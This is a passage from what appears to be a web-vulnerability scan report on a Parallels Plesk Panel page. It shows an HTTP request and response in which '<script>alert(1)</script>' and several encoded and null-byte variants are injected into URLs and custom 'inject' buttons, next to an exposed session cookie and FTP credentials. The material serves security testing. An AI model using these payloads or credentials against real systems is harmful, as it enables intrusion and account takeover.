<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/trust_wave.jpg"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]})'>Trustwave PCI Validation</a></h4>
<div class="package-description">Utilize Trustwave monthly server scans to keep you PCI compliant</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "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"); apsCatalog.showDetails({"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li></ul></div>

8.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com
Cookie: PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:38:19 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:38:19 GMT
Connection: close
Content-Length: 40367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="48333f77aef379c04c82252b59636182" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Websites &amp; Domains - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="web-sites-and-domains">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/web/action-name/view" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fweb%2Fview%2Fid%2F1%2F%253Cscript%253Ealert%281%29%253C%2Ffdf080d9f1bbdb1b327620b2%3Fdom_id%3D1%26dom_name%3Dvulnerable.host.fqdn%26ftp_user%3Dxsscx%26ftp_pass%3DLL12345%252521%252521%26cl_id%3D2%26cname%3DHoyt%2BLLC%2BResearch%26pname%3DHoyt%2BLLC%2BResearch%26email%3Dh02332%2540gmail.com' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>Websites &amp; Domains</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.namespace('Smb.Views.Web');

Smb.Views.Web.updateSiteCopyStatus = function() {
new Ajax.Request(Jsw.baseUrl + '/web/site-copy-status/taskId/', {
method: 'get',
parameters: {},
onSuccess: function(transport) {
var result = transport.responseText.evalJSON();

if ('running' == result.status) {
setTimeout("Smb.Views.Web.updateSiteCopyStatus()", 10000);
} else {
$('siteCopyProgress').remove();
if ('ok' == result.status) {
Jsw.addStatusMessage('info', result.message);
} else {
Jsw.addStatusMessage('error', result.message);
}
}
}
});
}

Jsw.onReady(function() {

new Jsw.Container({
renderTo: 'main',
items: [{
componentType: 'Jsw.Hint',
hint: 'This is where you set up and manage websites. If you have several subscriptions associated with your account, then you can switch from one subscription to another by selecting the required subscription at the top of the screen. Note that you can host a number of websites under a single subscription, so there is no need to purchase any additional subscriptions.' }, {
componentType: 'Jsw.ListContainer',
cls: 'tools-list',
itemClass: 'tools-item',
items: [null,null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/site-aps_32.gif","title":"Applications","comment":"Install and manage web apps on your websites. Forums, photo galleries, collaboration tools, and many more installed in several clicks.","href":"\/app"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/file-manager_32.gif","title":"File Manager","comment":"Upload new files and work with current files and directories of your websites.","href":"\/web\/file-manager"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/web-stats_32.gif","title":"Web Statistics","comment":"View the reports on how your websites are visited: See how many people visited a site and which webpages they viewed.","handler":"function() { window.open(\"http:\/\/vulnerable.host.fqdn\/plesk-stat\/webstat\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false; }"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/ftp-access_32.gif","title":"FTP Access","comment":"Set up access to files of your websites over FTP protocol.","href":"\/web\/ftp-access"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/dns_32.gif","title":"DNS Settings","comment":"Manage DNS zones for your domain names.","href":"\/web\/proxy\/type\/dns"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/certificates_32.gif","title":"SSL Certificates","comment":"Install an SSL certificate on a domain to secure data that your site visitors send to and receive from the site.","href":"\/web\/proxy\/type\/ssl-certificates"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/backup_32.gif","title":"Backup Manager","comment":"Back up and restore your domains, including settings and content of 
websites and mail accounts.","href":"\/web\/backup"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/hosting-setup_32.gif","title":"Web Hosting Settings","comment":"Manage the global hosting settings for all websites, and set up a password for access to the webspace for uploading files.","href":"\/web\/edit"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/databases_32.gif","title":"Databases","comment":"Create and remove databases used by your websites, and manage them using integrated administrative web application.","href":"\/database\/list"},{"componentType":"Smb.ToolButton","href":"fdf080d9f1bbdb1b327620b2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ab12c6c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"<script>alert(1)<\/script>?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?%00ddf96<a>904a89e5ae2","icon":"\/images\/custom_buttons\/{0-abc54de0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"cf063<a>01df0b1d826?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-bc2ea8c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"cf063%253ca%253e01df0b1d826?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bd2637c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00cf063<a>01df0b1d826?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-be190400-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_b4de2<a>3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ca6d6340-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_b4de2%253ca%253e3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-cb24ad20-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_%00b4de2<a>3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-cbdbf700-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_c3316%2522%253e%253ca%253ee36b31545cd?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d2e12520-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_4d488%2522a%253d%2522b%2522c2595ff0661?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d504a160-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_4afbe%2522%2520a%253db%2520ca44d269b97?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d7281da0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/xss.cx?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"XSS.CX","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b51d93c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"}] }, {
componentType: 'Jsw.Panel',
id: 'advancedPanel',
title: 'Show Advanced Operations',
hideContentTitle: 'Hide Advanced Operations',
cls: 'tools-list-box operations-list-box',
hidden: true,
items: [{
componentType: 'Jsw.ListContainer',
cls: 'tools-list',
itemClass: 'tools-item',
emptyItemClass: 'tools-item-empty',
items: [{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/protected-dirs_16.gif","title":"Password-protected Directories","comment":"Restrict access to selected areas of your websites with password protection.","href":"\/web\/proxy\/type\/protected-dirs"},null,null,null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/maintenance-mode_16.gif","title":"Website Maintenance Mode","comment":"Switch a site off for maintenance and let the site visitors know that this is done on purpose and the site will be up soon.","href":"\/web\/proxy\/type\/maintenance-mode"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/copy_16.gif","title":"Website Copying","comment":"Copy website files to another site or external FTP storage.","href":"\/web\/proxy\/type\/copy"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/site-production_16.gif","title":"Learn How to Move a Site from Development to Production","comment":"View instructions on how to put an updated website into production.","href":"\/web\/site-production"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/how-to-clone-site_16.gif","title":"Learn How to Clone a Site to Development Environment","comment":"View instructions on how to clone the whole website (files, databases and applications).","href":"\/web\/how-to-clone-site"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/logs_16.gif","title":"Logs","comment":"View logs and configure recycling of log files.","href":"\/web\/proxy\/type\/logs"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/hotlink-prot_16.gif","title":"Hotlink Protection","comment":"Protect content of your websites from hotlinking.","href":"\/web\/proxy\/type\/hotlink-protection"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/web-dirs_16.gif","title":"Virtual 
Directories","comment":"Create and manage virtual directories for your websites.","href":"\/web\/proxy\/type\/web-dirs"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/band-limit_16.gif","title":"Bandwidth Limiting","comment":"Adjust the limit on bandwidth usage and connections to your websites.","href":"\/web\/proxy\/type\/bandwidth-limit"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/iis-app-pool_16.gif","title":"Dedicated IIS Application Pool for Your Websites","comment":"Set up a dedicated IIS application pool for serving websites associated with the currently selected subscription.","href":"\/web\/iis-app-pool"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/dom-aliases_16.gif","title":"Domain Aliases","comment":"View and manage alternative domain names for your websites.","href":"\/web\/proxy\/type\/domain-aliases"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/shared-ssl_16.gif","title":"Master SSL Domain","comment":"Use an SSL certificate associated with one of your websites for securing connections to other sites with the shared SSL service.","href":"\/web\/master-shared-ssl"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/web-users_16.gif","title":"Web Users","comment":"Set up accounts for users who can host personal web pages on your websites.","href":"\/web\/web-users"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/odbc-dc_16.gif","title":"ODBC Data Sources","comment":"Set up ODBC data sources.","href":"\/web\/proxy\/type\/odbc-data-sources"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/asp-net-settings_16.gif","title":"ASP.NET Settings","comment":"Configure the settings of ASP.NET framework.","href":"\/web\/proxy\/type\/asp-net-settings"},null] }]
}]
});


new Jsw.Panel({
cls: 'list-box',
renderTo: 'main',

items: [
new Jsw.Hint({
hint: 'A website is a collection of related web pages, images, videos, and other files that are accessible by a common domain name. Here is a list of your websites, from which you can change website hosting settings, open a website directory in file manager, view statistics on website visits, install an SSL certificate, view web server logs, and change DNS zone settings.' }),

new Jsw.List({
id: 'sites-list',
searchable: false,
disabledSelectHint: 'The main domain name cannot be removed.',
data: {"pager":{"pageCount":1,"itemCountPerPage":25,"first":1,"current":1,"last":1,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":1,"totalItemCount":1,"firstItemNumber":1,"lastItemNumber":1},"state":{"sortField":"displayName","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":[],"forceShowSearch":false},"data":[{"mainDomain":true,"id":"d:1","domainId":1,"sortKey":"vulnerable.host.fqdn_","displayName":"nosedivesailing.com","statusInactive":null,"hostingType":"vrt_hst","webrootDir":"httpdocs","forwardingUrl":null,"changeHostingUrl":"\/web\/change-hosting\/id\/1","setupUrl":"\/web\/settings\/id\/1","filemanagerUrl":"\/web\/file-manager\/dir\/%2Fhttpdocs","sitebuilderUrl":"","sitebuilderLegacyUrl":null,"statisticsUrl":"window.open(\"http:\/\/vulnerable.host.fqdn\/plesk-stat\/webstat\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false;","certificatesUrl":"\/web\/proxy\/type\/ssl-certificates\/id\/1","logsUrl":"\/web\/proxy\/type\/logs\/id\/1","dnsUrl":"\/web\/proxy\/type\/dns\/id\/1","previewUrl":"window.open(\"\/sitepreview\/http\/vulnerable.host.fqdn\/?randomHash=fac86a6afec6c447c6c1492a91272242\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false; ","maintenanceMode":false,"maintenanceModeUrl":"\/web\/maintenance-mode\/id\/1"}],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/web/list-data',

isDisabledItem: function(item) {
return item.mainDomain;
},

columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'Domain',
sortable: true,
dataIndex: 'displayName',
renderer: function(item) {
var inactivitySign = item.statusInactive
? '<b>inactive</b>'
: '';

var link = '<a href="' + Jsw.baseUrl + item.setupUrl + '">'
+ item.displayName.escapeHTML() + '</a>';


if (item.mainDomain) {
link = '<strong class="primary-domain">' + link + '</strong>';
}

if (item.statusInactive) {
link = link
+ '<div class="hint-attention">'
+ 'Inactive' + '</div>';
}

if (item.maintenanceMode) {
link = link
+ '<div class="hint-attention">'
+ 'Switched off for maintenance.' + ' <a href="' + Jsw.baseUrl + item.maintenanceModeUrl + '">'
+ 'Change' + '</a>'
+ '</div>';
}

if (item.hostingType == 'subdomain') {
link = '<div class="level1">' + link + '</div>';
}

return link;
}
},
{
header: 'Hosting',
sortable: false,
renderer: function(item) {
var message = '';

if (item.hostingType == 'vrt_hst' || item.hostingType == 'subdomain') {

var webrootDir = item.webrootDir;

if (item.filemanagerUrl) {
webrootDir = '<a href="' + Jsw.baseUrl + item.filemanagerUrl + '">'
+ item.webrootDir
+ '</a>';
}

message = '<img src="' + Jsw.skinUrl + '/img/icons/small/website_16.gif"/>'
+ ' '
+ 'Website at' + ' '
+ webrootDir;

} else if (item.hostingType == 'none') {
message = '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" />'
+ '<em class="hint">' + 'No web hosting' + '</em>'
+ ' '
+ '<a href="' + Jsw.baseUrl + item.changeHostingUrl + '">['
+ 'add' + ']</a>';

} else if (item.hostingType == 'frm_fwd' || item.hostingType == 'std_fwd') {

message = '<img src="' + Jsw.skinUrl + '/img/icons/small/forward-to-dom_16.gif"/>'
+ ' '
+ 'Forward to' + ' '
+ '<a href="' + item.forwardingUrl + '">'
+ item.forwardingUrl
+ '</a>';
}

return message;
}
},
{
header: '',
cls: 'action-icon-set t-r',
renderer: function(item) {

var content = '';

content += !item.previewUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Preview the website in your browser. Note that some scripts and Flash animation used on the site might not work in the preview mode.' + '</span>'
+ '<a href="#" onclick=\'' + item.previewUrl + '\'>'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/preview_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.filemanagerUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Go to website folder for managing files of the website.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.filemanagerUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/website-folder_16.gif"/>'
+ '</a>'
+ '</span> ';

if (item.hostingType != 'subdomain') {
content += !item.sitebuilderUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Edit the site in SiteBuilder.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.sitebuilderUrl + '" target="_blank">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/sitebuilder_16.gif"/>'
+ '</a>'
+ '</span> ';
}
content += !item.sitebuilderLegacyUrl
? ''
: '<span>'
+ '<span class="tooltipData">'
+ 'Edit the site in SiteBuilder 4.5 (legacy).' + '</span>'
+ '<a href="' + item.sitebuilderLegacyUrl + '" target="_blank">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/sitebuilder_16.gif"/>'
+ '</a>'
+ '</span> ';

if (item.hostingType == 'subdomain' && !item.sitebuilderLegacyUrl) {
content += '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> ';
}

content += !item.statisticsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
